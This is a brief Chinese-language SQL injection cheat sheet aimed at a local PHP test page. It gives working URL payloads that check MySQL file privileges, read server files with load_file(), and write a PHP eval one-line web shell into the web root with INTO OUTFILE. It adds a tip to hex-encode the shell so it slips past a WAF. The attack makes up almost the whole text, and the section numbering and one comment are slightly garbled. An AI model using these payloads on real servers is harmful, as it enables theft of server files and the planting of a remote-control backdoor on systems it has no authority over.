00x1 判斷是否可讀
code:
http://127.0.0.1/1.php?id=1 and (select count(*) from mysql.user) >0--
/*
返回正確的話,說明沒有是有讀的權限。
返回錯誤,那極有可能是權限降了。
能夠判斷出mysql的長度說明是可以讀取其長度,自然就是可讀。 */
00x2 判斷是否可讀
code:
http://127.0.0.1/1.php?id=1 and (select count(file_priv) from mysql.user) >0--
/*
file_priv:權限表,確定用戶是否可以執行SELECT INTO OUTFILE和LOAD DATA INFILE命令。更多權限表:http://www.cnblogs.com/kissdodog/p/4173337.html
*/
00x2 使用load_file讀文件
code:
http://127.0.0.1/1.php?id=-1 union select 1,2,load_file('D:/wamp/www/test.txt')--
/*
D:/wamp/www/test.txt可替換為十六進制的,如下所示。
http://127.0.0.1/1.php?id=1 union select 1,2,load_file(char('0x443A2F77616D702F7777772F746573742E747874'))
*/
00x2 使用out_file寫入木馬文件
code;
http://127.0.0.1/index.php?id=-1 union select 1,'<?php eval($_POST[cmd])?>',3 into outfile 'D:/wamp/www/test.php'--
/*
<?php eval($_POST[cmd])?> 該句一句話木馬可以轉換為十六進制的。可躲避waf之類的。
寫入文件的斜杠必須是/
*/
